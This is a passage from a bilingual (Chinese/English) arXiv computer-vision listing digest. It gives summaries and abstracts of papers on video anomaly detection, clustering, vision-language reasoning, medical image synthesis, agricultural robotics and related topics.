类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to IEEE ICME 2026
Abstract:As embodied perception systems increasingly bridge digital and physical realms in interactive multimedia applications, the need for privacy-preserving approaches to understand human activities in physical environments has become paramount. Video anomaly detection is a critical task in such embodied multimedia systems for intelligent surveillance and forensic analysis. Skeleton-based approaches have emerged as a privacy-preserving alternative that processes physical world information through abstract human pose representations while discarding sensitive visual attributes such as identity and facial features. However, existing skeleton-based methods predominantly model continuous motion trajectories in a monolithic manner, failing to capture the hierarchical nature of human activities composed of discrete semantic primitives and fine-grained kinematic details, which leads to reduced discriminability when anomalies manifest at different abstraction levels. In this regard, we propose Motion Semantics Guided Normalizing Flow (MSG-Flow) that decomposes skeleton-based VAD into hierarchical motion semantics modeling. It employs vector quantized variational auto-encoder to discretize continuous motion into interpretable primitives, an autoregressive Transformer to model semantic-level temporal dependencies, and a conditional normalizing flow to capture detail-level pose variations. Extensive experiments on benchmarks (HR-ShanghaiTech HR-UBnormal) demonstrate that MSG-Flow achieves state-of-the-art performance with 88.1% and 75.8% AUC respectively.
[CV-290] CNMBI: Determining the Number of Clusters Using Center Pairwise Matching and Boundary Filtering
【速读】:该论文旨在解决无监督聚类中如何在缺乏先验信息的情况下自动确定最优簇数(cluster number)的问题。传统方法通常依赖于聚类有效性指标(validity index),并假设数据服从特定分布,这限制了其在高维、大规模真实数据(如图像数据)中的适用性。解决方案的关键在于提出一种名为CNMBI的新方法:它不依赖完整的聚类结果或复杂的有效性指数设计,而是将问题建模为簇中心之间基于位置行为的动态比较过程,并利用二分图(bipartite graph)理论高效建模该过程;同时首次引入样本置信度机制,主动剔除低置信度样本,从而提升簇数判定的鲁棒性和灵活性。
链接: https://arxiv.org/abs/2603.26744
作者: Ruilin Zhang,Haiyang Zheng,Hongpeng Wang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:One of the main challenges in data mining is choosing the optimal number of clusters without prior information. Notably, existing methods are usually in the philosophy of cluster validation and hence have underlying assumptions on data distribution, which prevents their application to complex data such as large-scale images and high-dimensional data from the real world. In this regard, we propose an approach named CNMBI. Leveraging the distribution information inherent in the data space, we map the target task as a dynamic comparison process between cluster centers regarding positional behavior, without relying on the complete clustering results and designing the complex validity index as before. Bipartite graph theory is then employed to efficiently model this process. Additionally, we find that different samples have different confidence levels and thereby actively remove low-confidence ones, which is, for the first time to our knowledge, considered in cluster number determination. CNMBI is robust and allows for more flexibility in the dimension and shape of the target data (e.g., CIFAR-10 and STL-10). Extensive comparison studies with state-of-the-art competitors on various challenging datasets demonstrate the superiority of our method.
[CV-291] Steering Sparse Autoencoder Latents to Control Dynamic Head Pruning in Vision Transformers (Student Abstract) AAAI2026
【速读】:该论文旨在解决视觉 Transformer (Vision Transformers, ViTs) 中动态注意力头剪枝(dynamic head pruning)效率与可解释性难以兼顾的问题。现有剪枝策略通常缺乏明确的控制机制,导致剪枝过程不可控且难以理解。其解决方案的关键在于引入稀疏自编码器(Sparse Autoencoders, SAEs),通过在 ViT 最终层残差嵌入上训练 SAE,将密集特征解耦为可解释且可控的稀疏潜在变量(sparse latents)。进一步地,通过对不同稀疏潜在变量采用差异化增强策略,实现对剪枝决策的类特定调控;例如,类别导向的“steering”方法能识别出仅使用少数几个注意力头(如 h2 和 h5)即可维持甚至提升准确率(如碗类从 76% 提升至 82%),同时显著降低头使用比例(从 0.72 降至 0.33)。这表明,稀疏潜在特征能够实现对动态剪枝的精细化控制,有效连接剪枝效率与机制可解释性。
链接: https://arxiv.org/abs/2603.26743
作者: Yousung Lee,Dongsoo Har
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 3 pages, 5 figures. Accepted as AAAI 2026 Student Abstract. Includes additional appendix with extended analysis
Abstract:Dynamic head pruning in Vision Transformers (ViTs) improves efficiency by removing redundant attention heads, but existing pruning policies are often difficult to interpret and control. In this work, we propose a novel framework by integrating Sparse Autoencoders (SAEs) with dynamic pruning, leveraging their ability to disentangle dense embeddings into interpretable and controllable sparse latents. Specifically, we train an SAE on the final-layer residual embedding of the ViT and amplify the sparse latents with different strategies to alter pruning decisions. Among them, per-class steering reveals compact, class-specific head subsets that preserve accuracy. For example, bowl improves accuracy (76% to 82%) while reducing head usage (0.72 to 0.33) via heads h2 and h5. These results show that sparse latent features enable class-specific control of dynamic pruning, effectively bridging pruning efficiency and mechanistic interpretability in ViTs.
[CV-292] Language-Conditioned World Modeling for Visual Navigation
【速读】:该论文旨在解决语言条件视觉导航(Language-Conditioned Visual Navigation, LCVN)中的接地问题,即在仅依赖初始视角观测的情况下,让具身智能体根据自然语言指令完成连续控制任务,而无法访问目标图像。核心挑战在于如何利用语言信息引导感知与动作决策,从而实现对环境的准确理解与导航。解决方案的关键在于将LCVN建模为基于语言指令的开环轨迹预测问题,并构建了一个包含39,016条轨迹和117,048条人工验证指令的大规模基准数据集(LCVN Dataset),支持可复现的研究。在此基础上,提出两类互补的框架:一是结合扩散世界模型(LCVN-WM)与基于潜在空间训练的Actor-Critic代理(LCVN-AC),强调时序一致性;二是采用自回归多模态架构(LCVN-Uni),联合预测动作与未来观测,提升对未见环境的泛化能力。这两类方法共同揭示了语言接地、想象(imagination)与策略学习在统一任务设定下的协同价值。
链接: https://arxiv.org/abs/2603.26741
作者: Yifei Dong,Fengyi Wu,Yilong Dai,Lingdong Kong,Guangyu Chen,Xu Zhu,Qiyu Hu,Tianyu Wang,Johnalbert Garnica,Feng Liu,Siyu Huang,Qi Dai,Zhi-Qi Cheng
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Robotics (cs.RO)
备注: 19 pages, 6 figures, Code: this https URL
Abstract:We study language-conditioned visual navigation (LCVN), in which an embodied agent is asked to follow a natural language instruction based only on an initial egocentric observation. Without access to goal images, the agent must rely on language to shape its perception and continuous control, making the grounding problem particularly challenging. We formulate this problem as open-loop trajectory prediction conditioned on linguistic instructions and introduce the LCVN Dataset, a benchmark of 39,016 trajectories and 117,048 human-verified instructions that supports reproducible research across a range of environments and instruction styles. Using this dataset, we develop LCVN frameworks that link language grounding, future-state prediction, and action generation through two complementary model families. The first family combines LCVN-WM, a diffusion-based world model, with LCVN-AC, an actor-critic agent trained in the latent space of the world model. The second family, LCVN-Uni, adopts an autoregressive multimodal architecture that predicts both actions and future observations. Experiments show that these families offer different advantages: the former provides more temporally coherent rollouts, whereas the latter generalizes better to unseen environments. Taken together, these observations point to the value of jointly studying language grounding, imagination, and policy learning in a unified task setting, and LCVN provides a concrete basis for further investigation of language-conditioned world models. The code is available at this https URL.
[CV-293] Beyond Static Visual Tokens: Structured Sequential Visual Chain-of-Thought Reasoning
【速读】:该论文旨在解决当前多模态大语言模型(Multimodal Large Language Models, MLLMs)在视觉推理中依赖静态视觉前缀和文本驱动推理、缺乏目标导向与自适应视觉访问的问题。其解决方案的关键在于提出结构化顺序视觉思维链(Structural Sequential Visual Chain-of-Thought, SSV-CoT),通过问题相关的显著性图(saliency map)识别并组织关键视觉区域,显式建模视觉重要性的空间分布;随后按照此判别性顺序进行推理,引导从主要线索到次要线索的课程式语义进展,从而实现端到端训练下的结构化和顺序性视觉认知。
链接: https://arxiv.org/abs/2603.26737
作者: Guangfu Guo,Xiaoqian Lu,Yue Feng,Mingming Sun
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Current multimodal LLMs encode images as static visual prefixes and rely on text-based reasoning, lacking goal-driven and adaptive visual access. Inspired by human visual perception-where attention is selectively and sequentially shifted from the most informative regions to secondary cues-we propose Structural Sequential Visual CoT SSV-CoT. First, a question-relevant saliency map identifies and organizes key visual regions, explicitly modeling the spatial distribution of visual importance. Second, reasoning is performed following this discriminative order, inducing a curriculum-like semantic progression from primary to secondary cues. This method is trained end-to-end, using text cot and answer supervision, without relying on region-level annotations or specialized external tools. Experiments on diverse visual reasoning benchmarks show gains, validating structured and sequential visual cognition.
[CV-294] Ordinal Semantic Segmentation Applied to Medical and Odontological Images
【速读】:该论文旨在解决当前深度学习方法在语义分割(Semantic Segmentation)任务中忽略类别间序关系(Ordinal Relationships)的问题,这种忽略可能导致分割结果缺乏语义一致性,从而影响场景的全局理解。解决方案的关键在于引入三类新型损失函数:单峰型(Unimodal)、准单峰型(Quasi-Unimodal)和空间型(Spatial)损失,它们通过建模类别排序信息来增强预测概率分布的有序性,并在相邻像素间施加一致性约束,从而提升分割结果的语义合理性与解剖学一致性。其中,Expanded Mean Squared Error (EXP_MSE)、Quasi-Unimodal Loss (QUL) 和基于信号距离函数的空间接触面损失(CSSDF)被特别验证在医学图像分割中具有良好的鲁棒性和泛化能力。
链接: https://arxiv.org/abs/2603.26736
作者: Mariana Dória Prata Lima,Gilson Antonio Giraldi,Jaime S. Cardoso
机构: LNCC (National Laboratory for Scientific Computing); INESC TEC (Institute for Systems and Computer Engineering, Technology and Science)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: 23 pages, 1 figure
Abstract:Semantic segmentation consists of assigning a semantic label to each pixel according to predefined classes. This process facilitates the understanding of object appearance and spatial relationships, playing an important role in the global interpretation of image content. Although modern deep learning approaches achieve high accuracy, they often ignore ordinal relationships among classes, which may encode important domain knowledge for scene interpretation. In this work, loss functions that incorporate ordinal relationships into deep neural networks are investigated to promote greater semantic consistency in semantic segmentation tasks. These loss functions are categorized as unimodal, quasi-unimodal, and spatial. Unimodal losses constrain the predicted probability distribution according to the class ordering, while quasi-unimodal losses relax this constraint by allowing small variations while preserving ordinal coherence. Spatial losses penalize semantic inconsistencies between neighboring pixels, encouraging smoother transitions in the image space. In particular, this study adapts loss functions originally proposed for ordinal classification to ordinal semantic segmentation. Among them, the Expanded Mean Squared Error (EXP_MSE), the Quasi-Unimodal Loss (QUL), and the spatial Contact Surface Loss using Signal Distance Function (CSSDF) are investigated. These approaches have shown promising results in medical imaging, improving robustness, generalization, and anatomical consistency.
[CV-295] Distilled Large Language Model-Driven Dynamic Sparse Expert Activation Mechanism
【速读】:该论文旨在解决视觉识别中因类别间相似性高、尺度变化极端以及计算资源有限而导致的可靠性下降问题,尤其针对工业缺陷检测场景中的跨类别模糊性和实时性挑战。其解决方案的关键在于提出一种基于蒸馏大语言模型(Distilled Large Language Model, LLM)驱动的稀疏专家混合模型(Distilled Large Language Model-Driven Sparse Mixture-of-Experts, DS-MoE),通过文本引导的动态路由机制实现语义与视觉特征的自适应对齐,并结合轻量级多尺度理解模块(MobileSAM编码器)提升推理效率与细节保留能力,从而在不依赖复杂标注流程的前提下显著增强模型泛化性能。
链接: https://arxiv.org/abs/2603.26735
作者: Qinghui Chen,Zekai Zhang,Zaigui Zhang,Kai Zhang,Dagang Li,Wenmin Wang,Jinglin Zhang,Cong Liu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:High inter-class similarity, extreme scale variation, and limited computational budgets hinder reliable visual recognition across diverse real-world data. Existing vision-centric and cross-modal approaches often rely on rigid fusion mechanisms and heavy annotation pipelines, leading to sub-optimal generalization. We propose the Distilled Large Language Model (LLM)-Driven Sparse Mixture-of-Experts (DS-MoE) framework, which integrates text-guided dynamic routing and lightweight multi-scale comprehension. The DS-MoE framework dynamically aligns textual semantics with defect-specific visual patterns through a sparse MoE architecture, where task-relevant experts are adaptively activated based on semantic relevance, resolving inter-class ambiguity. A lightweight MobileSAM encoder enables real-time inference while preserving multi-scale defect details. Extensive experiments on PCB, aluminum foil, and mold defect datasets demonstrate that our framework achieves superior performance compared to existing pure vision models. \textbfDS-MoE surpasses YOLOv8/YOLOX with gains of +13.9, +1.4, and +2.0 pp mAP@ 0.5:0.95 on BBMP, aluminum, and PCB, respectively, while also improving precision and recall.
[CV-296] Contextual inference from single objects in Vision-Language models
【速读】:该论文旨在解决视觉语言模型(Vision-Language Models, VLMs)中单个物体所携带的场景上下文信息如何组织的问题,这一问题对模型鲁棒性具有直接意义。解决方案的关键在于通过系统的行为实验与机制分析,发现单个物体在遮蔽背景条件下仍能支持细粒度场景类别和粗粒度超类场景(室内/室外)的高于随机水平的推断,且其性能受与人类场景分类一致的物体属性调节;进一步揭示出物体表征在去除背景后保持稳定时更有利于成功的情境推理,同时发现场景身份信息贯穿网络各层以图像标记形式编码,而超类信息仅在后期或根本不出现,表明两种场景语义的表征机制存在本质差异。
链接: https://arxiv.org/abs/2603.26731
作者: Martina G. Vilas,Timothy Schaumlöffel,Gemma Roig
机构: Goethe University Frankfurt (歌德大学法兰克福); The Hessian Center for AI (黑森州人工智能中心)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:How much scene context a single object carries is a well-studied question in human scene perception, yet how this capacity is organized in vision-language models (VLMs) remains poorly understood, with direct implications for the robustness of these models. We investigate this question through a systematic behavioral and mechanistic analysis of contextual inference from single objects. Presenting VLMs with single objects on masked backgrounds, we probe their ability to infer both fine-grained scene category and coarse superordinate context (indoor vs. outdoor). We found that single objects support above-chance inference at both levels, with performance modulated by the same object properties that predict human scene categorization. Object identity, scene, and superordinate predictions are partially dissociable: accurate inference at one level neither requires nor guarantees accurate inference at the others, and the degree of coupling differs markedly across models. Mechanistically, object representations that remain stable when background context is removed are more predictive of successful contextual inference. Scene and superordinate schemas are grounded in fundamentally different ways: scene identity is encoded in image tokens throughout the network, while superordinate information emerges only late or not at all. Together, these results reveal that the organization of contextual inference in VLMs is more complex than accuracy alone suggests, with behavioral and mechanistic signatures
[CV-297] Multi-view Graph Convolutional Network with Fully Leverag ing Consistency via Granular-ball-based Topology Construction Feature Enhancement and Interactive Fusion
【速读】:该论文旨在解决现有基于图卷积网络(Graph Convolutional Network, GCN)的多视图学习方法在利用三类一致性(节点间一致性、特征间一致性与视图间一致性)方面的局限性问题。具体而言,传统方法依赖KNN构建拓扑结构导致k值选择主观性强,难以有效捕捉节点间一致性;忽视单视图内的特征间一致性,影响嵌入表示质量;且视图融合通常在各视图独立进行图卷积后执行,未能充分挖掘视图间的交互一致性。解决方案的关键在于提出MGCN-FLC模型,通过三个核心模块实现对三类一致性的全面利用:基于粒球算法(Granular Ball, GB)的拓扑构建模块以高内聚方式聚类节点来增强节点间一致性;特征增强模块通过建模特征间一致性提升局部表示能力;交互融合模块则促使各视图深度协同,从而获得更全面的视图间一致性,显著提升了多视图表征学习效果。
链接: https://arxiv.org/abs/2603.26729
作者: Chengjie Cui,Taihua Xua,Shuyin Xia,Qinghua Zhang,Yun Cui,Shiping Wang
机构: Jiangsu University of Science and Technology (江苏科技大学); Chongqing University of Posts and Telecommunications (重庆邮电大学); Fuzhou University (福州大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:The effective utilization of consistency is crucial for multi-view learning. GCNs leverage node connections to propagate information across the graph, facilitating the exploitation of consistency in multi-view data. However, most existing GCN-based multi-view methods suffer from several limitations. First, current approaches predominantly rely on KNN for topology construction, where the artificial selection of the k value significantly constrains the effective exploitation of inter-node consistency. Second, the inter-feature consistency within individual views is often overlooked, which adversely affects the quality of the final embedding representations. Moreover, these methods fail to fully utilize inter-view consistency as the fusion of embedded representations from multiple views is often implemented after the intra-view graph convolutional operation. Collectively, these issues limit the model’s capacity to fully capture inter-node, inter-feature and inter-view consistency. To address these issues, this paper proposes the multi-view graph convolutional network with fully leveraging consistency via GB-based topology construction, feature enhancement and interactive fusion (MGCN-FLC). MGCN-FLC can fully utilize three types of consistency via the following three modules to enhance learning ability:The topology construction module based on the granular ball algorithm, which clusters nodes into granular balls with high internal similarity to capture inter-node consistency;The feature enhancement module that improves feature representations by capturing inter-feature consistency;The interactive fusion module that enables each view to deeply interact with all other views, thereby obtaining more comprehensive inter-view consistency. Experimental results on nine datasets show that the proposed MGCN-FLC outperforms state-of-the-art semi-supervised node classification methods.
[CV-298] he Nonverbal Gap: Toward Affective Computer Vision for Safer and More Equitable Online Dating
【速读】:该论文旨在解决在线约会平台因缺乏非语言线索(如目光接触、面部表情、身体姿态和反应时间)而导致的沟通鸿沟问题,这一鸿沟对女性造成不成比例的安全风险。解决方案的关键在于提出一个以公平性优先的研究议程,涵盖四个核心能力领域:实时不适检测、伴侣间参与度不对称建模、知情同意交互设计以及纵向互动摘要生成,均基于成熟的计算机视觉(Computer Vision, CV)方法,并结合浪漫关系中的社会心理学机制。该议程强调必须构建在双人知情同意协议下采集的专用数据集、跨种族、性别身份、神经多样性及文化背景的公平性评估,以及承诺本地化处理架构以防止情感数据被平台用于监控基础设施,从而推动将在线约会安全确立为首个值得重视的研究领域。
链接: https://arxiv.org/abs/2603.26727
作者: Ratna Kandala,Niva Manchanda,Akshata Kishore Moharir
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Online dating has become the dominant way romantic relationships begin, yet current platforms strip the nonverbal cues: gaze, facial expression, body posture, response timing, that humans rely on to signal comfort, disinterest, and consent, creating a communication gap with disproportionate safety consequences for women. We argue that this gap represents both a technical opportunity and a moral responsibility for the computer vision community, which has developed the affective tools, facial action unit detection, gaze estimation, engagement modeling, and multimodal affect recognition, needed to begin addressing it, yet has largely ignored the dating domain as a research context. We propose a fairness-first research agenda organized around four capability areas: real-time discomfort detection, engagement asymmetry modeling between partners, consent-aware interaction design, and longitudinal interaction summarization, each grounded in established CV methodology and motivated by the social psychology of romantic communication. We argue that responsible pursuit of this agenda requires purpose-built datasets collected under dyadic consent protocols, fairness evaluation disaggregated across race, gender identity, neurotype, and cultural background, and architectural commitments to on-device processing that prevent affective data from becoming platform surveillance infrastructure. This vision paper calls on the WICV community, whose members are uniquely positioned to understand both the technical opportunity and the human stakes, to establish online dating safety as a first-class research domain before commercial deployment outpaces ethical deliberation.
[CV-299] A Multimodal Deep Learning Framework for Edema Classification Using HCT and Clinical Data
【速读】:该论文旨在解决脑水肿(brain edema)多模态检测中如何有效融合结构化头部CT(HCT)影像与常规临床元数据(clinical metadata)的问题。现有方法常忽视两者间的互补性,或采用简单拼接策略,导致信息利用不充分且缺乏可解释性。其解决方案的关键在于提出AttentionMixer框架:首先使用自监督视觉Transformer自动编码器(ViT-AE++)对HCT进行无监督特征提取;随后将临床元数据映射至相同特征空间,并作为交叉注意力(cross-attention)模块中的keys和values,以HCT特征向量为queries实现动态调制;最后通过轻量级MLP-Mixer进一步优化融合表示,兼顾全局依赖建模与参数效率。该设计实现了结构化、可解释的多模态融合,在真实临床数据下表现出高鲁棒性和优越性能。
链接: https://arxiv.org/abs/2603.26726
作者: Aram Ansary Ogholbake,Hannah Choi,Spencer Brandenburg,Alyssa Antuna,Zahraa Al-Sharshahi,Makayla Cox,Haseeb Ahmed,Jacqueline Frank,Nathan Millson,Luke Bauerle,Jessica Lee,David Dornbos III,Qiang Cheng
机构: University of Kentucky (肯塔基大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:We propose AttentionMixer, a unified deep learning framework for multimodal detection of brain edema that combines structural head CT (HCT) with routine clinical metadata. While HCT provides rich spatial information, clinical variables such as age, laboratory values, and scan timing capture complementary context that might be ignored or naively concatenated. AttentionMixer is designed to fuse these heterogeneous sources in a principled and efficient manner. HCT volumes are first encoded using a self-supervised Vision Transformer Autoencoder (ViT-AE++), without requiring large labeled datasets. Clinical metadata are mapped into the same feature space and used as keys and values in a cross-attention module, where HCT-derived feature vector serves as queries. This cross-attention fusion allows the network to dynamically modulate imaging features based on patient-specific context and provides an interpretable mechanism for multimodal integration. A lightweight MLP-Mixer then refines the fused representation before final classification, enabling global dependency modeling with substantially reduced parameter overhead. Missing or incomplete metadata are handled via a learnable embedding, promoting robustness to real-world clinical data quality. We evaluate AttentionMixer on a curated brain HCT cohort with expert edema annotations using five-fold cross-validation. Compared with strong HCT-only, metadata-only, and prior multimodal baselines, AttentionMixer achieves superior performance (accuracy 87.32%, precision 92.10%, F1-score 85.37%, AUC 94.14%). Ablation studies confirm the benefit of both cross-attention and MLP-Mixer refinement, and permutation-based metadata importance analysis highlights clinically meaningful variables driving predictions. These results demonstrate that structured, interpretable multimodal fusion can substantially improve edema detection in clinical practice.
[CV-300] An Annotation-to-Detection Framework for Autonomous and Robust Vine Trunk Localization in the Field by Mobile Agricultural Robots
【速读】:该论文旨在解决农业环境中对象检测与定位的挑战,特别是针对自主移动机器人在未见过的非结构化场景中进行高效、实时检测的需求,同时避免依赖大规模人工标注的真实世界数据集。其核心解决方案是提出一个端到端的“注释到检测”(annotation-to-detection)框架,关键在于结合跨模态注释迁移(cross-modal annotation transfer)和早期传感器融合(early-stage sensor fusion)策略,并通过多阶段检测架构实现增量式训练与性能提升。该方法显著提升了模型在有限且部分标注数据下的多模态感知能力,在不同光照条件和作物密度下实现了高精度的葡萄藤主干定位(平均距离误差<0.37m,单次遍历识别率>70%),验证了其在近地农业场景中的鲁棒性和实用性。
链接: https://arxiv.org/abs/2603.26724
作者: Dimitrios Chatziparaschis,Elia Scudiero,Brent Sams,Konstantinos Karydis
机构: University of California, Riverside (加州大学河滨分校); Gallo (加洛)
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
备注: 7 pages, 6 figures, conference
Abstract:The dynamic and heterogeneous nature of agricultural fields presents significant challenges for object detection and localization, particularly for autonomous mobile robots that are tasked with surveying previously unseen unstructured environments. Concurrently, there is a growing need for real-time detection systems that do not depend on large-scale manually labeled real-world datasets. In this work, we introduce a comprehensive annotation-to-detection framework designed to train a robust multi-modal detector using limited and partially labeled training data. The proposed methodology incorporates cross-modal annotation transfer and an early-stage sensor fusion pipeline, which, in conjunction with a multi-stage detection architecture, effectively trains and enhances the system’s multi-modal detection capabilities. The effectiveness of the framework was demonstrated through vine trunk detection in novel vineyard settings that featured diverse lighting conditions and varying crop densities to validate performance. When integrated with a customized multi-modal LiDAR and Odometry Mapping (LOAM) algorithm and a tree association module, the system demonstrated high-performance trunk localization, successfully identifying over 70% of trees in a single traversal with a mean distance error of less than 0.37m. The results reveal that by leveraging multi-modal, incremental-stage annotation and training, the proposed framework achieves robust detection performance regardless of limited starting annotations, showcasing its potential for real-world and near-ground agricultural applications.
[CV-301] Deep Learning Multi-Horizon Irradiance Nowcasting: A Comparative Evaluation of Three Methods for Leverag ing Sky Images
【速读】:该论文旨在解决如何有效将全天域成像仪(All-Sky Imager, ASI)图像融入深度学习(Deep Learning, DL)模型以提升全局水平辐照度(Global Horizontal Irradiance, GHI)短临预报精度的问题。其关键解决方案在于提出三种不同的特征处理策略:直接使用卷积神经网络(CNN)从原始RGB图像中提取特征、基于领域知识(如云分割、云运动矢量、太阳位置和云底高度)构建二维特征图后输入CNN进行复合特征提取,以及将工程化二维特征图聚合为时间序列输入。实验表明,第三种方法——以聚合后的工程特征作为模型输入——表现最优,证明了无需复杂空间有序的DL架构即可实现ASI图像的有效融合,凸显了替代性图像处理方法及改进的空间特征处理潜力。
链接: https://arxiv.org/abs/2603.26704
作者: Erling W. Eriksen,Magnus M. Nygård,Niklas Erdmann,Heine N. Riise
机构: Institute for Energy Technology (能源技术研究所); University of Oslo Department of Technology Systems (奥斯陆大学技术系统系)
类目: ystems and Control (eess.SY); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:We investigate three distinct methods of incorporating all-sky imager (ASI) images into deep learning (DL) irradiance nowcasting. The first method relies on a convolutional neural network (CNN) to extract features directly from raw RGB images. The second method uses state-of-the-art algorithms to engineer 2D feature maps informed by domain knowledge, e.g., cloud segmentation, the cloud motion vector, solar position, and cloud base height. These feature maps are then passed to a CNN to extract compound features. The final method relies on aggregating the engineered 2D feature maps into time-series input. Each of the three methods were then used as part of a DL model trained on a high-frequency, 29-day dataset to generate multi-horizon forecasts of global horizontal irradiance up to 15 minutes ahead. The models were then evaluated using root mean squared error and skill score on 7 selected days of data. Aggregated engineered ASI features as model input yielded superior forecasting performance, demonstrating that integration of ASI images into DL nowcasting models is possible without complex spatially-ordered DL-architectures and inputs, underscoring opportunities for alternative image processing methods as well as the potential for improved spatial DL feature processing methods.
[CV-302] SpatialPoint: Spatial-aware Point Prediction for Embodied Localization
【速读】:该论文旨在解决具身智能(embodied intelligence)中关键的3D空间行为决策问题,即如何根据视觉观测和语言指令准确预测可执行的3D点位,以支持物理交互与导航任务。其核心挑战在于现有视觉-语言模型(VLM)主要依赖RGB图像输入,难以实现跨场景的鲁棒几何推理,限制了在真实机器人应用中的泛化能力。解决方案的关键在于提出SpatialPoint框架,通过显式整合结构化深度信息(structured depth)到VLM中,生成相机坐标系下的3D坐标,并构建包含260万样本的RGB-D数据集用于训练与评估。实验表明,该方法显著提升了具身定位(embodied localization)性能,并在真实机器人平台上验证了其在抓取、放置和导航三类任务中的有效性。
链接: https://arxiv.org/abs/2603.26690
作者: Qiming Zhu,Zhirui Fang,Tianming Zhang,Chuanxiu Liu,Xiaoke Jiang,Lei Zhang
机构: Visincept Research; Tsinghua University; International Digital Economy Academy (IDEA)
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注: 19 pages, 12 figures, supplementary material included
Abstract:Embodied intelligence fundamentally requires a capability to determine where to act in 3D space. We formalize this requirement as embodied localization – the problem of predicting executable 3D points conditioned on visual observations and language instructions. We instantiate embodied localization with two complementary target types: touchable points, surface-grounded 3D points enabling direct physical interaction, and air points, free-space 3D points specifying placement and navigation goals, directional constraints, or geometric relations. Embodied localization is inherently a problem of embodied 3D spatial reasoning – yet most existing vision-language systems rely predominantly on RGB inputs, necessitating implicit geometric reconstruction that limits cross-scene generalization, despite the widespread adoption of RGB-D sensors in robotics. To address this gap, we propose SpatialPoint, a spatial-aware vision-language framework with careful design that integrates structured depth into a vision-language model (VLM) and generates camera-frame 3D coordinates. We construct a 2.6M-sample RGB-D dataset covering both touchable and air points QA pairs for training and evaluation. Extensive experiments demonstrate that incorporating depth into VLMs significantly improves embodied localization performance. We further validate SpatialPoint through real-robot deployment across three representative tasks: language-guided robotic arm grasping at specified locations, object placement to target destinations, and mobile robot navigation to goal positions.
[CV-303] Contextual Graph Representations for Task-Driven 3D Perception and Planning
【速读】:该论文旨在解决3D场景图(3D scene graphs)在机器人任务规划中因状态空间过大而导致的计算效率低下问题,尤其是在资源受限环境下难以部署的挑战。其核心解决方案在于:首先,评估现有具身人工智能(embodied AI)环境在机器人任务规划与3D场景图交叉研究中的适用性,并构建基准以对比先进经典规划器的性能;其次,探索利用图神经网络(graph neural networks)挖掘规划领域中关系结构的不变性,从而学习更高效的表示,提升规划速度。
链接: https://arxiv.org/abs/2603.26685
作者: Christopher Agia
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: University of Toronto Undergraduate Thesis, 2021. 85 pages, 24 figures
Abstract:Recent advances in computer vision facilitate fully automatic extraction of object-centric relational representations from visual-inertial data. These state representations, dubbed 3D scene graphs, are a hierarchical decomposition of real-world scenes with a dense multiplex graph structure. While 3D scene graphs claim to promote efficient task planning for robot systems, they contain numerous objects and relations when only small subsets are required for a given task. This magnifies the state space that task planners must operate over and prohibits deployment in resource constrained settings. This thesis tests the suitability of existing embodied AI environments for research at the intersection of robot task planning and 3D scene graphs and constructs a benchmark for empirical comparison of state-of-the-art classical planners. Furthermore, we explore the use of graph neural networks to harness invariances in the relational structure of planning domains and learn representations that afford faster planning.
[CV-304] MRI-to-CT synthesis using drifting models
【速读】:该论文旨在解决从磁共振成像(MRI)中高保真合成计算机断层扫描(CT)图像的问题,以支持无需额外电离辐射的MR-only盆腔 workflows,例如放射治疗计划和PET/MR衰减校正。其核心解决方案是采用一种新颖的“漂移模型”(drifting model),该模型通过单步推理实现快速且高质量的CT图像生成,在保持结构一致性(如皮质骨边界、骶骨与股骨头几何形态)的同时显著优于传统卷积神经网络(UNet、VAE)、生成对抗网络(WGAN-GP)、物理启发的概率模型(PPFM)以及多步扩散模型(FastDDPM、DDIM、DDPM)等基线方法。关键优势在于:在毫秒级推理时间内达成接近或超越迭代扩散采样的图像质量,从而在准确性和效率之间实现了更优权衡。
链接: https://arxiv.org/abs/2603.28498
作者: Qing Lyu,Jianxu Wang,Jeremy Hudson,Ge Wang,Chirstopher T. Whitlow
机构: Yale School of Medicine (耶鲁医学院); Rensselaer Polytechnic Institute (伦斯勒理工学院)
类目: Image and Video Processing (eess.IV); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Accurate MRI-to-CT synthesis could enable MR-only pelvic workflows by providing CT-like images with bone details while avoiding additional ionizing radiation. In this work, we investigate recently proposed drifting models for synthesizing pelvis CT images from MRI and benchmark them against convolutional neural networks (UNet, VAE), a generative adversarial network (WGAN-GP), a physics-inspired probabilistic model (PPFM), and diffusion-based methods (FastDDPM, DDIM, DDPM). Experiments are performed on two complementary datasets: Gold Atlas Male Pelvis and the SynthRAD2023 pelvis subset. Image fidelity and structural consistency are evaluated with SSIM, PSNR, and RMSE, complemented by qualitative assessment of anatomically critical regions such as cortical bone and pelvic soft-tissue interfaces. Across both datasets, the proposed drifting model achieves high SSIM and PSNR and low RMSE, surpassing strong diffusion baselines and conventional CNN-, VAE-, GAN-, and PPFM-based methods. Visual inspection shows sharper cortical bone edges, improved depiction of sacral and femoral head geometry, and reduced artifacts or over-smoothing, particularly at bone-air-soft tissue boundaries. Moreover, the drifting model attains these gains with one-step inference and inference times on the order of milliseconds, yielding a more favorable accuracy-efficiency trade-off than iterative diffusion sampling while remaining competitive in image quality. These findings suggest that drifting models are a promising direction for fast, high-quality 